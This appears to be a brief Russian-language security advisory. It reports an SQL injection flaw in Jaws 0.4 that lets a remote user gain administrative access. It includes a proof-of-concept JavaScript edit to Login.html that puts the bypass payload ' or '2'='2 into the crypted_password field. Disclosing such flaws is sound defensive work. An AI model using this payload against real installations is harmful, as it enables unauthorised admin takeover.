Программа: Jaws 0.4
Уязвимость SQL инъекции в Jaws позволяет удаленному пользователю получить административный доступ к приложению.
Удаленный пользователь может внедрить SQL комадны в “user”, “password” и "crypted_password" переменные.
Пример (измените javascript функцию в Login.html):
<script type="text/javascript">
function crypt_form(form) {
var new_password = calcMD5(form.password.value);
form.crypted_password.value = "' or '2'='2";
form.password.value = "";
return true;
</script>